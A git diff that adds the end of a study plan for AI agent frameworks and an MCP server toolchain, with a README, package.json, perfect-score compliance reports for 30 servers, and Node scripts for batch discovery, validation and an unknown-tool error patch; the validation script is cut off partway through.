platform connections +- Run the agent locally, verify it responds in Discord + +**Homework:** +- [ ] Create a character file from scratch (no copy-paste from examples) — give it a distinct personality +- [ ] Deploy the agent to your Discord test server and have a 10-message conversation with it +- [ ] Screenshot the conversation and note: What worked? What felt off? How does character configuration affect responses? 
+ +--- + +### Day 3 (Wednesday): Multi-Platform + Plugin System + +**Study (1-2 hrs):** +- Add a second platform — connect the same agent to Telegram (or Twitter) + - Same character, same agent, two platforms simultaneously + - Observe: does memory carry across? How does the agent handle platform-specific features? +- Study the plugin architecture: + - Read how `plugin-discord` and `plugin-telegram` are structured + - Understand the `Plugin` interface — what does a plugin provide? + - Look at how Actions work — these are the agent's "tools" +- Write a custom Action plugin: + - Something simple: a weather lookup, a file reader, or a joke generator + - Register it and verify your agent can use it on both platforms + +**Homework:** +- [ ] Run your agent on 2 platforms simultaneously — screenshot both conversations +- [ ] Build a custom Action plugin from scratch and verify it works +- [ ] Write a comparison: how does ElizaOS's plugin system compare to Pydantic-AI's tool system and MetaGPT's action system? What are the trade-offs? + +--- + +### Day 4 (Thursday): Source Code Reading + Advanced Patterns + +**Study (1-2 hrs):** +- Read the key source files from the table above, focusing on: + - **runtime.ts** — How does the AgentRuntime process an incoming message? What's the evaluation pipeline? + - **types.ts** — What are all the interfaces? How extensible is the system? + - **memory.ts** — How is conversation history stored and retrieved? What's the embedding strategy? +- Study advanced patterns: + - Multi-agent setups — can you run multiple agents with different characters? + - Custom evaluators — how do you add post-processing logic? + - Custom providers — how do you inject context into every agent response? +- Compare deployment architecture decisions: + - How does ElizaOS handle rate limiting across platforms? + - How does it handle platform-specific message formatting (embeds, buttons, etc.)? + - What's the error handling strategy when a platform adapter fails? 
+ +**Homework:** +- [ ] Write a "What I'd Steal From ElizaOS" doc — which patterns are worth using in your own projects? Think: + - Character file abstraction for agent personality + - Plugin registration pattern + - Platform adapter interface + - Memory routing across services +- [ ] Identify the 3 biggest architectural weaknesses (every framework has them) + +--- + +### Day 5 (Friday): Integration Project — Deploy a Week 1-6 Agent + +**The real test:** Take an agent you built in Weeks 1-6 and deploy it to at least one chat platform using patterns learned from ElizaOS. + +**Options (pick one):** +1. **Pydantic-AI agent → Discord:** Take your structured-output agent from Week 1 and wrap it in a Discord bot using ElizaOS's adapter patterns (or build your own minimal adapter inspired by their architecture) +2. **GPT Researcher → Telegram:** Take your research agent from Week 4 and make it accessible via Telegram — users send a topic, agent researches and responds +3. **Multi-framework pipeline → Discord:** Take your Week 6 MetaGPT multi-agent setup and expose it through a Discord interface where users can kick off the SOP workflow + +**Homework:** +- [ ] Deploy a previously-built agent to a real chat platform — it must respond to real messages +- [ ] Write a retrospective for ElizaOS: + - **Strengths:** What does it do better than building your own deployment layer? + - **Weaknesses:** Where is it limited or frustrating? + - **When to use:** What type of project benefits most from ElizaOS? + - **When to skip:** When is it overkill or the wrong tool? +- [ ] Update the comparison matrix with the ElizaOS column +- [ ] Answer: "If I were building a production agent for a client, would I use ElizaOS for deployment or roll my own? Why?" + +### Key Questions You Should Be Able to Answer After Week 7 + +1. How does ElizaOS's character system differ from hardcoding agent personalities? +2. 
What's the plugin registration lifecycle — from `Plugin` definition to runtime availability? +3. How would you add a completely new platform (e.g., Slack, WhatsApp) to ElizaOS? +4. What are the trade-offs of a deployment-platform approach vs building bespoke platform integrations? +5. How does multi-platform memory work — and where does it break down? +6. When is ElizaOS the right choice vs a simple Discord.js bot? +7. What deployment patterns from ElizaOS would you steal for a custom agent pipeline? + +--- + +## Week 8: Capstone Project + +> **Timeline:** 1 week | **Difficulty:** ⭐⭐⭐⭐⭐ | **Goal:** Synthesize learnings from 3+ frameworks + +### The Project: "Research → Analyze → Act" Pipeline + +Build a system that combines at least 3 of the frameworks you studied: + +#### Recommended Architecture + +``` +┌─────────────────────────────────────────────────────────┐ +│ Capstone Pipeline │ +│ │ +│ ┌──────────────┐ ┌──────────────┐ ┌────────────┐ │ +│ │ GPT │ │ Pydantic-AI │ │ MetaGPT OR │ │ +│ │ Researcher │───▶│ Structured │───▶│ MS Agent │ │ +│ │ (Research) │ │ Analysis │ │ Framework │ │ +│ │ │ │ Agent │ │ (Execute) │ │ +│ └──────────────┘ └──────────────┘ └────────────┘ │ +│ │ +│ Optional additions: │ +│ - Agent-S for browser automation during research │ +│ - Yao for scheduling periodic re-research │ +└─────────────────────────────────────────────────────────┘ +``` + +#### Requirements + +- [ ] **Stage 1: Research** — Use GPT Researcher to conduct deep research on a topic +- [ ] **Stage 2: Analysis** — Use Pydantic-AI to process research into structured data with validated output types +- [ ] **Stage 3: Action** — Use MetaGPT's multi-agent SOP OR MS Agent Framework's graph workflow to generate deliverables from the structured analysis +- [ ] **Integration:** The output of one stage must be the input to the next +- [ ] **Documentation:** Write a README explaining your architecture and design decisions + +#### Stretch Goals + +- [ ] Add a Yao scheduled trigger so the 
pipeline runs daily/weekly +- [ ] Deploy the entire pipeline to Discord/Telegram using ElizaOS patterns from Week 7 +- [ ] Add observability (Logfire or OpenTelemetry) +- [ ] Add a web UI (even simple HTML) +- [ ] Use MCP to connect components +- [ ] Add Agent-S for any browser automation steps + +#### Deliverables + +- [ ] Working code at `~/agent-study/capstone/` +- [ ] `README.md` with architecture diagram and setup instructions +- [ ] `DECISIONS.md` explaining why you chose each framework for each stage +- [ ] `RETROSPECTIVE.md` — final thoughts on the 8-week journey + +#### Suggested Topics for the Pipeline + +1. **Competitor Analysis Tool** — Research competitors → Structure findings → Generate strategic recommendations +2. **Daily News Briefing** — Research trending topics → Analyze relevance → Generate personalized newsletter +3. **Technical Due Diligence** — Research a technology → Structured pros/cons → Multi-perspective report (architect, PM, engineer roles) +4. **Market Research Report** — Research a market → Structured data extraction → Executive summary + detailed report + +--- + +## Appendix: Comparison Matrix Template + +Save this at `~/agent-study/comparison-matrix/matrix.md` and fill it in weekly: + +```markdown +# AI Agent Framework Comparison Matrix + +| Dimension | Pydantic-AI | MS Agent Framework | Agent-S | GPT Researcher | Yao | MetaGPT | ElizaOS | +|-----------|-------------|-------------------|---------|----------------|-----|---------|---------| +| **Language** | Python | Python + .NET | Python | Python | Go | Python | TypeScript | +| **Stars** | 14.6k | 7k | 9.6k | 25k | 7.5k | 63k | 17k | +| **Agent Definition** | | | | | | | | +| **Tool Integration** | | | | | | | | +| **Multi-Agent Coord.** | | | | | | | | +| **Error Handling** | | | | | | | | +| **Observability** | | | | | | | | +| **Type Safety** | | | | | | | | +| **DX / Ergonomics** | | | | | | | | +| **Production Readiness** | | | | | | | | +| **Unique Superpower** | | | | | | | 
| +| **Biggest Weakness** | | | | | | | | +| **Best Use Case** | | | | | | | | +| **Would I Use For...** | | | | | | | | +| **Overall Rating (1-10)** | | | | | | | | +``` + +--- + +## 📊 Week-by-Week Schedule Overview + +| Week | Framework | Focus | Difficulty | Key Deliverables | +|------|-----------|-------|------------|------------------| +| 0 | Prep | Setup & background reading | ⭐ | Environment ready, papers skimmed | +| 1 | Pydantic-AI | Type-safe agents, DI, structured output | ⭐⭐ | Architecture doc, 3 agents, steal doc | +| 2 | MS Agent Framework | Graph workflows, DevUI, enterprise patterns | ⭐⭐⭐ | Graph workflow, DevUI screenshots, steal doc | +| 3 | Agent-S | Computer use, visual grounding, screenshots | ⭐⭐⭐⭐ | Computer use demo, architecture analysis | +| 4 | GPT Researcher | Deep research, Plan-and-Solve, RAG | ⭐⭐ | Research agent, MCP integration | +| 5 | Yao | Event-driven agents, Go, single binary, GraphRAG | ⭐⭐⭐⭐ | Event-driven agent, DSL exploration | +| 6 | MetaGPT | SOPs, multi-agent teams, roles/actions | ⭐⭐⭐ | Multi-agent SOP, comparison matrix | +| 7 | ElizaOS | Deployment, multi-platform distribution, plugins | ⭐⭐ | Multi-platform agent, custom plugin, deploy a Week 1-6 agent | +| 8 | Capstone | Integrate 3+ frameworks | ⭐⭐⭐⭐⭐ | Working pipeline, docs, retrospective | + +--- + +## 🏁 Success Criteria + +After completing this study plan, you should be able to: + +1. **Explain** the architecture of each framework from memory (whiteboard test) +2. **Build** a production-grade agent with Pydantic-AI from scratch +3. **Design** a graph workflow for a complex multi-step process +4. **Understand** computer-use agent architecture and its limitations +5. **Implement** a Plan-and-Solve research pipeline +6. **Compare** event-driven vs request-response agent architectures +7. **Deploy** an agent to Discord/Telegram and understand multi-platform routing patterns +8. **Choose** the right framework for a given problem with clear reasoning +9. 
**Read** any agent framework's source code and quickly identify its core abstractions + +> *"The goal isn't to memorize APIs. It's to build intuition for how agent systems are designed, so you can build your own or extend existing ones with confidence."* + +--- + +*Generated by Clawdbot | February 4, 2026* diff --git a/factory-tools/README.md b/factory-tools/README.md new file mode 100644 index 0000000..2849e42 --- /dev/null +++ b/factory-tools/README.md @@ -0,0 +1,105 @@ +# MCP Factory Tools + +Toolchain for building, testing, validating, and shipping MCP servers at scale. + +## What's Installed + +### Testing & Validation +| Tool | Type | Purpose | +|------|------|---------| +| **mcp-jest** (global CLI) | npm | Discover tools, generate tests, validate protocol compliance, watch mode | +| **mcp-validator** (Janix-ai) | Python (cloned) | Formal MCP protocol compliance reports (2024-11-05 → 2025-06-18) | +| **MCP Inspector** (official) | Cloned | Visual web UI for interactive server debugging | + +### Development +| Tool | Type | Purpose | +|------|------|---------| +| **FastMCP** (npm) | Library | Opinionated TS framework for building new MCP servers fast | +| **mcp-add** (global CLI) | npm | One-liner install for customers to add servers to any MCP client | + +## Quick Commands + +### Discover all tools across 30 servers +```bash +cd factory-tools && node scripts/discover-all.mjs +``` +Generates test configs in `test-configs/` for every server. + +### Validate all servers for MCP compliance +```bash +cd factory-tools && node scripts/validate-all.mjs +``` +Produces compliance reports in `reports/` (JSON + Markdown). 
+ +### Validate a single server +```bash +mcp-jest validate --config test-configs/calendly.json +``` + +### Discover a single server's tools +```bash +mcp-jest discover --config test-configs/calendly.json +``` + +### Run tests against a server (requires real API keys) +```bash +# Edit test-configs/calendly-tests.json to add real CALENDLY_API_KEY +mcp-jest --config test-configs/calendly-tests.json +``` + +### Compliance report via mcp-validator (Python) +```bash +cd mcp-validator && source .venv/bin/activate +python -m mcp_testing.scripts.compliance_report \ + --server-command "node ../mcp-diagrams/mcp-servers/calendly/dist/index.js" \ + --protocol-version 2025-06-18 +``` + +## Directory Structure +``` +factory-tools/ +├── README.md +├── package.json +├── server-registry.json # All 30 servers, their env vars +├── scripts/ +│ ├── discover-all.mjs # Batch discovery +│ ├── validate-all.mjs # Batch validation +│ └── fix-unknown-tool-error.mjs # Template-level bug fix (already applied) +├── test-configs/ # Generated per-server test configs +│ ├── calendly.json # Base config (for discover/validate) +│ └── calendly-tests.json # Full test suite (for testing) +├── reports/ # Compliance & discovery reports +├── mcp-validator/ # Cloned: Python compliance testing +├── mcp-inspector/ # Cloned: Visual debugging UI +└── node_modules/ # fastmcp, mcp-jest (local) +``` + +## Server Status (as of 2026-02-04) +- **30 servers**, **243 tools** +- **702 test cases** auto-generated +- **100/100 compliance** (all servers FULL compliant after bug fix) +- Bug fixed: Unknown tool error handling (McpError + ErrorCode.MethodNotFound) + +## For New Servers (use FastMCP) +```typescript +import { FastMCP } from "fastmcp"; +import { z } from "zod"; + +const server = new FastMCP({ name: "My Server", version: "1.0.0" }); + +server.addTool({ + name: "my_tool", + description: "Does a thing", + parameters: z.object({ input: z.string() }), + execute: async (args) => String(args.input), +}); + +server.start({ 
transportType: "stdio" }); +``` + +## For Customer Install Docs +```bash +npx mcp-add --name calendly --type local \ + --command "npx mcp-server-calendly" \ + --scope global --clients "claude,cursor,vscode" +``` diff --git a/factory-tools/mcp-inspector b/factory-tools/mcp-inspector new file mode 160000 index 0000000..dd02737 --- /dev/null +++ b/factory-tools/mcp-inspector @@ -0,0 +1 @@ +Subproject commit dd027374636888a830bc22f389ccabcfc7fa7af2 diff --git a/factory-tools/mcp-validator b/factory-tools/mcp-validator new file mode 160000 index 0000000..bb099dd --- /dev/null +++ b/factory-tools/mcp-validator @@ -0,0 +1 @@ +Subproject commit bb099ddc3b9d9564e13d138d5378705657566706 diff --git a/factory-tools/package.json b/factory-tools/package.json new file mode 100644 index 0000000..b0c51b0 --- /dev/null +++ b/factory-tools/package.json @@ -0,0 +1,16 @@ +{ + "name": "mcp-factory-tools", + "version": "1.0.0", + "description": "MCP Factory toolchain — testing, validation, scaffolding", + "private": true, + "scripts": { + "test:all": "node scripts/test-all-servers.mjs", + "validate:all": "node scripts/validate-all-servers.mjs", + "report": "node scripts/generate-report.mjs" + }, + "type": "module", + "dependencies": { + "fastmcp": "^3.31.0", + "mcp-jest": "^1.2.1" + } +} diff --git a/factory-tools/reports/compliance-2026-02-05.json b/factory-tools/reports/compliance-2026-02-05.json new file mode 100644 index 0000000..d35abe9 --- /dev/null +++ b/factory-tools/reports/compliance-2026-02-05.json @@ -0,0 +1,194 @@ +{ + "date": "2026-02-05T01:09:13.163Z", + "summary": { + "total": 30, + "validated": 30, + "avgScore": 100, + "perfect": 30, + "good": 0, + "needsWork": 0 + }, + "commonIssues": [], + "servers": [ + { + "name": "acuity-scheduling", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "bamboohr", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "basecamp", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": 
"bigcommerce", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "brevo", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "calendly", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "clickup", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "close", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "clover", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "constant-contact", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "fieldedge", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "freshbooks", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "freshdesk", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "gusto", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "helpscout", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "housecall-pro", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "jobber", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "keap", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "lightspeed", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "mailchimp", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "pipedrive", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "rippling", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "servicetitan", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "squarespace", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "toast", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "touchbistro", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "trello", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "wave", + "score": 100, + "level": "FULL", 
+ "issues": [] + }, + { + "name": "wrike", + "score": 100, + "level": "FULL", + "issues": [] + }, + { + "name": "zendesk", + "score": 100, + "level": "FULL", + "issues": [] + } + ] +} \ No newline at end of file diff --git a/factory-tools/reports/compliance-2026-02-05.md b/factory-tools/reports/compliance-2026-02-05.md new file mode 100644 index 0000000..cac090e --- /dev/null +++ b/factory-tools/reports/compliance-2026-02-05.md @@ -0,0 +1,37 @@ +# MCP Factory Compliance Report + +**Date:** 2/4/2026 +**Average Score:** 100/100 + +| Server | Score | Level | Issues | +|--------|-------|-------|--------| +| 🟢 acuity-scheduling | 100/100 | FULL | None | +| 🟢 bamboohr | 100/100 | FULL | None | +| 🟢 basecamp | 100/100 | FULL | None | +| 🟢 bigcommerce | 100/100 | FULL | None | +| 🟢 brevo | 100/100 | FULL | None | +| 🟢 calendly | 100/100 | FULL | None | +| 🟢 clickup | 100/100 | FULL | None | +| 🟢 close | 100/100 | FULL | None | +| 🟢 clover | 100/100 | FULL | None | +| 🟢 constant-contact | 100/100 | FULL | None | +| 🟢 fieldedge | 100/100 | FULL | None | +| 🟢 freshbooks | 100/100 | FULL | None | +| 🟢 freshdesk | 100/100 | FULL | None | +| 🟢 gusto | 100/100 | FULL | None | +| 🟢 helpscout | 100/100 | FULL | None | +| 🟢 housecall-pro | 100/100 | FULL | None | +| 🟢 jobber | 100/100 | FULL | None | +| 🟢 keap | 100/100 | FULL | None | +| 🟢 lightspeed | 100/100 | FULL | None | +| 🟢 mailchimp | 100/100 | FULL | None | +| 🟢 pipedrive | 100/100 | FULL | None | +| 🟢 rippling | 100/100 | FULL | None | +| 🟢 servicetitan | 100/100 | FULL | None | +| 🟢 squarespace | 100/100 | FULL | None | +| 🟢 toast | 100/100 | FULL | None | +| 🟢 touchbistro | 100/100 | FULL | None | +| 🟢 trello | 100/100 | FULL | None | +| 🟢 wave | 100/100 | FULL | None | +| 🟢 wrike | 100/100 | FULL | None | +| 🟢 zendesk | 100/100 | FULL | None | diff --git a/factory-tools/reports/discovery-2026-02-05.json b/factory-tools/reports/discovery-2026-02-05.json new file mode 100644 index 0000000..04a0b4e --- /dev/null +++ 
b/factory-tools/reports/discovery-2026-02-05.json @@ -0,0 +1,126 @@ +{ + "passed": [ + { + "name": "acuity-scheduling", + "tools": 16 + }, + { + "name": "bamboohr", + "tools": 12 + }, + { + "name": "basecamp", + "tools": 14 + }, + { + "name": "bigcommerce", + "tools": 31 + }, + { + "name": "brevo", + "tools": 25 + }, + { + "name": "calendly", + "tools": 15 + }, + { + "name": "clickup", + "tools": 22 + }, + { + "name": "close", + "tools": 46 + }, + { + "name": "clover", + "tools": 23 + }, + { + "name": "constant-contact", + "tools": 27 + }, + { + "name": "fieldedge", + "tools": 30 + }, + { + "name": "freshbooks", + "tools": 26 + }, + { + "name": "freshdesk", + "tools": 25 + }, + { + "name": "gusto", + "tools": 9 + }, + { + "name": "helpscout", + "tools": 23 + }, + { + "name": "housecall-pro", + "tools": 22 + }, + { + "name": "jobber", + "tools": 24 + }, + { + "name": "keap", + "tools": 32 + }, + { + "name": "lightspeed", + "tools": 32 + }, + { + "name": "mailchimp", + "tools": 15 + }, + { + "name": "pipedrive", + "tools": 31 + }, + { + "name": "rippling", + "tools": 21 + }, + { + "name": "servicetitan", + "tools": 23 + }, + { + "name": "squarespace", + "tools": 18 + }, + { + "name": "toast", + "tools": 19 + }, + { + "name": "touchbistro", + "tools": 21 + }, + { + "name": "trello", + "tools": 34 + }, + { + "name": "wave", + "tools": 23 + }, + { + "name": "wrike", + "tools": 22 + }, + { + "name": "zendesk", + "tools": 21 + } + ], + "failed": [], + "total": 30 +} \ No newline at end of file diff --git a/factory-tools/scripts/discover-all.mjs b/factory-tools/scripts/discover-all.mjs new file mode 100644 index 0000000..7cd8a04 --- /dev/null +++ b/factory-tools/scripts/discover-all.mjs @@ -0,0 +1,107 @@ +#!/usr/bin/env node +/** + * MCP Factory — Batch Discovery + * Runs mcp-jest discover on all 30 servers, generates test configs. + * Uses dummy env vars so servers start without real API keys. 
+ */ + +import { readFileSync, writeFileSync, mkdirSync, existsSync } from 'fs'; +import { execSync } from 'child_process'; +import { resolve, dirname } from 'path'; +import { fileURLToPath } from 'url'; + +const __dirname = dirname(fileURLToPath(import.meta.url)); +const FACTORY_ROOT = resolve(__dirname, '..'); +const registry = JSON.parse(readFileSync(resolve(FACTORY_ROOT, 'server-registry.json'), 'utf-8')); +const SERVERS_ROOT = resolve(FACTORY_ROOT, registry.servers_root); + +// Output dirs: per-server configs and JSON reports, created up front if missing +const CONFIGS_DIR = resolve(FACTORY_ROOT, 'test-configs'); +const REPORTS_DIR = resolve(FACTORY_ROOT, 'reports'); +mkdirSync(CONFIGS_DIR, { recursive: true }); +mkdirSync(REPORTS_DIR, { recursive: true }); + +const results = { passed: [], failed: [], total: 0 }; + +for (const [name, meta] of Object.entries(registry.servers)) { + results.total++; + const serverDir = resolve(SERVERS_ROOT, name); + const distEntry = resolve(serverDir, 'dist/index.js'); + + if (!existsSync(distEntry)) { + console.log(`⚠️ ${name}: No dist/index.js — needs build`); + results.failed.push({ name, reason: 'no dist' }); + continue; + } + + // Build env object: every variable the registry lists for this server gets the same placeholder value + const env = {}; + for (const envVar of meta.env) { + env[envVar] = 'factory_discovery_dummy'; + } + + // Create the base config (rewritten on every run): start the built server with node and the placeholder env + const config = { + server: { + command: 'node', + args: [distEntry], + env + } + }; + + const configPath = resolve(CONFIGS_DIR, `${name}.json`); + writeFileSync(configPath, JSON.stringify(config, null, 2)); + + try { + console.log(`🔍 Discovering ${name}...`); + const output = execSync(`mcp-jest discover --config "${configPath}"`, { + timeout: 30000, + encoding: 'utf-8', + cwd: CONFIGS_DIR, + stdio: ['pipe', 'pipe', 'pipe'] + }); + + // Pick up the generated config; mcp-jest is expected to leave mcp-jest.generated.json in its cwd (CONFIGS_DIR) + const generatedPath = resolve(CONFIGS_DIR, 'mcp-jest.generated.json'); + if (existsSync(generatedPath)) { + const generated = JSON.parse(readFileSync(generatedPath, 'utf-8')); + // Replace the generated config's server env with the placeholder env built above + generated.server.env = env; + 
writeFileSync(resolve(CONFIGS_DIR, `${name}-tests.json`), JSON.stringify(generated, null, 2)); + execSync(`rm "${generatedPath}"`); + + const toolCount = Object.keys(generated.tests?.tools || {}).length; + console.log(` ✅ ${name}: ${toolCount} test cases generated`); + results.passed.push({ name, tools: toolCount }); + } else { results.failed.push({ name, reason: 'mcp-jest.generated.json not produced' }); } // discover exited 0 but wrote nothing: record it so passed and failed always add up to total + } catch (err) { + const stderr = err.stderr?.toString() || err.message; + console.log(` ❌ ${name}: ${stderr.split('\n')[0]}`); + results.failed.push({ name, reason: stderr.split('\n')[0] }); + } +} + +// Summary +console.log('\n' + '═'.repeat(60)); +console.log(' MCP FACTORY — DISCOVERY REPORT'); +console.log('═'.repeat(60)); +console.log(`\nTotal: ${results.total}`); +console.log(`Passed: ${results.passed.length}`); +console.log(`Failed: ${results.failed.length}`); + +if (results.passed.length > 0) { + const totalTools = results.passed.reduce((sum, r) => sum + r.tools, 0); + console.log(`\nTotal test cases generated: ${totalTools}`); +} + +if (results.failed.length > 0) { + console.log('\nFailed servers:'); + for (const f of results.failed) { + console.log(` - ${f.name}: ${f.reason}`); + } +} + +// Write report +const reportPath = resolve(REPORTS_DIR, `discovery-${new Date().toISOString().split('T')[0]}.json`); +writeFileSync(reportPath, JSON.stringify(results, null, 2)); +console.log(`\nReport saved: ${reportPath}`); diff --git a/factory-tools/scripts/fix-unknown-tool-error.mjs b/factory-tools/scripts/fix-unknown-tool-error.mjs new file mode 100644 index 0000000..16860df --- /dev/null +++ b/factory-tools/scripts/fix-unknown-tool-error.mjs @@ -0,0 +1,125 @@ +#!/usr/bin/env node +/** + * MCP Factory — Fix Unknown Tool Error + * Patches all 30 servers to properly throw McpError for unknown tools + * instead of catching and returning isError:true (which MCP spec treats as success). + * Servers whose SDK types import or request handler is not recognized are left unwritten and counted under Errors. + * The fix: + * 1. Import McpError and ErrorCode from the SDK + * 2. Check tool name against known tools before calling handler + * 3. 
Throw McpError(ErrorCode.MethodNotFound) for unknown tools + */ + +import { readFileSync, writeFileSync, readdirSync, existsSync } from 'fs'; +import { execSync } from 'child_process'; +import { resolve, dirname } from 'path'; +import { fileURLToPath } from 'url'; + +const __dirname = dirname(fileURLToPath(import.meta.url)); +const FACTORY_ROOT = resolve(__dirname, '..'); +const registry = JSON.parse(readFileSync(resolve(FACTORY_ROOT, 'server-registry.json'), 'utf-8')); +const SERVERS_ROOT = resolve(FACTORY_ROOT, registry.servers_root); + +let fixed = 0; +let skipped = 0; +let errors = 0; + +for (const [name] of Object.entries(registry.servers)) { + const srcPath = resolve(SERVERS_ROOT, name, 'src/index.ts'); + + if (!existsSync(srcPath)) { + console.log(`⚠️ ${name}: No src/index.ts`); + skipped++; + continue; + } + + let src = readFileSync(srcPath, 'utf-8'); + + // Check if already fixed + if (src.includes('McpError')) { + console.log(`⏭️ ${name}: Already has McpError import`); + skipped++; + continue; + } + + try { + // Step 1: Add McpError and ErrorCode to the existing import from types.js + const typesImportMatch = src.match(/(import\s*\{[^}]*\}\s*from\s*"@modelcontextprotocol\/sdk\/types\.js";)/); + if (!typesImportMatch) { + // The injected check references McpError and ErrorCode, so patching without this import would break the build + throw new Error('No import from "@modelcontextprotocol/sdk/types.js" found'); + } + const oldImport = typesImportMatch[1]; + // Rebuild the specifier list from its names so the edit works whatever spacing or line breaks the braces contain + const newImport = oldImport.replace(/\{([^}]*)\}/, (_, list) => { + const names = list.split(',').map(n => n.trim()).filter(Boolean); + return `{ ${[...names, 'McpError', 'ErrorCode'].join(', ')} }`; + }); + src = src.replace(oldImport, newImport); + const beforeHandlerPatch = src; + + // Step 2: Find the CallToolRequestSchema handler and add tool name validation before its try/catch + 
const handlerPattern = /server\.setRequestHandler\(CallToolRequestSchema,\s*async\s*\(request\)\s*=>\s*\{\s*const\s*\{\s*name,\s*arguments:\s*args\s*\}\s*=\s*request\.params;\s*\n\s*try\s*\{/; + + if (handlerPattern.test(src)) { + src = src.replace( + handlerPattern, + `server.setRequestHandler(CallToolRequestSchema, async (request) => { + const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, \`Unknown tool: \${name}\`); + } + + try {` + ); + } else { + // Try a more flexible pattern + const altPattern = /server\.setRequestHandler\(CallToolRequestSchema,\s*async\s*\(request\)\s*=>\s*\{/; + if (altPattern.test(src)) { + // Check if there's already a tool validation + const handlerBlock = src.substring(src.search(altPattern)); + if (handlerBlock.includes('const { name') && !handlerBlock.includes('knownTools')) { + // Insert after the destructuring + src = src.replace( + /const\s*\{\s*name,\s*arguments:\s*args\s*\}\s*=\s*request\.params;\s*\n/, + `const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, \`Unknown tool: \${name}\`); + } + +` + ); + } + } + } + + if (src === beforeHandlerPatch) { + // Neither handler shape matched: do not write a file that only has its import changed + throw new Error('CallToolRequestSchema handler not recognized, patch manually'); + } + + writeFileSync(srcPath, src); + console.log(`✅ ${name}: Patched`); + fixed++; + + // Rebuild + try { + execSync('npm run build', { cwd: resolve(SERVERS_ROOT, name), timeout: 15000, stdio: 'pipe' }); + console.log(` 🔨 ${name}: Rebuilt`); + } catch (buildErr) { + console.log(` ⚠️ ${name}: Build warning (check manually)`); + } + } catch (err) { + console.log(`❌ ${name}: ${err.message}`); + errors++; + } +} + +console.log('\n' + '═'.repeat(60)); +console.log(`Fixed: ${fixed} | Skipped: ${skipped} | Errors: ${errors}`); 
diff --git a/factory-tools/scripts/validate-all.mjs b/factory-tools/scripts/validate-all.mjs
new file mode 100644
index 0000000..a6ef974
--- /dev/null
+++ b/factory-tools/scripts/validate-all.mjs
@@ -0,0 +1,149 @@
+#!/usr/bin/env node
+/**
+ * MCP Factory — Batch Protocol Validation
+ * Runs mcp-jest validate on every server in server-registry.json and
+ * collects compliance scores into JSON + Markdown reports under reports/.
+ */
+
+import { readFileSync, writeFileSync, mkdirSync, existsSync } from 'fs';
+import { execSync } from 'child_process';
+import { resolve, dirname } from 'path';
+import { fileURLToPath } from 'url';
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const FACTORY_ROOT = resolve(__dirname, '..');
+const registry = JSON.parse(readFileSync(resolve(FACTORY_ROOT, 'server-registry.json'), 'utf-8'));
+const SERVERS_ROOT = resolve(FACTORY_ROOT, registry.servers_root);
+
+const CONFIGS_DIR = resolve(FACTORY_ROOT, 'test-configs');
+const REPORTS_DIR = resolve(FACTORY_ROOT, 'reports');
+mkdirSync(REPORTS_DIR, { recursive: true });
+
+/** Traffic-light marker for a score; ⚪ when no score is available. */
+function scoreEmoji(score) {
+  if (score === null) return '⚪';
+  return score >= 95 ? '🟢' : score >= 80 ? '🟡' : '🔴';
+}
+
+/**
+ * Pull score, level and failed-test descriptions out of mcp-jest output.
+ * The fallbacks are returned when the output has no "Score: N/100" or
+ * "Level: X" line.
+ */
+function parseValidation(output, fallbackScore, fallbackLevel) {
+  const scoreMatch = output.match(/Score:\s*(\d+)\/100/);
+  const levelMatch = output.match(/Level:\s*(\S+)/);
+  const issues = [...output.matchAll(/❌\s*\[(\w+)\s*\]\s*(.+)/g)].map(m => m[2].trim());
+  return {
+    score: scoreMatch ? parseInt(scoreMatch[1], 10) : fallbackScore,
+    level: levelMatch ? levelMatch[1] : fallbackLevel,
+    issues
+  };
+}
+
+/** First non-blank line of `text`, trimmed; '' when there is none. */
+function firstLine(text) {
+  const line = String(text ?? '').split('\n').find(l => l.trim() !== '');
+  return line ? line.trim() : '';
+}
+
+/** Escape text for a Markdown table cell (pipes and newlines break the row). */
+function mdCell(text) {
+  return String(text).replace(/\r?\n/g, ' ').replace(/\|/g, '\\|');
+}
+
+const results = [];
+let totalScore = 0;
+
+for (const name of Object.keys(registry.servers)) {
+  const configPath = resolve(CONFIGS_DIR, `${name}.json`);
+
+  if (!existsSync(configPath)) {
+    console.log(`⚠️ ${name}: No config — run discover first`);
+    results.push({ name, score: null, level: 'SKIPPED', issues: ['No config file'] });
+    continue;
+  }
+
+  let result;
+  try {
+    console.log(`🔬 Validating ${name}...`);
+    const output = execSync(`mcp-jest validate --config "${configPath}" 2>&1`, {
+      timeout: 30000,
+      encoding: 'utf-8',
+      stdio: ['pipe', 'pipe', 'pipe']
+    });
+    result = { name, ...parseValidation(output, null, 'UNKNOWN') };
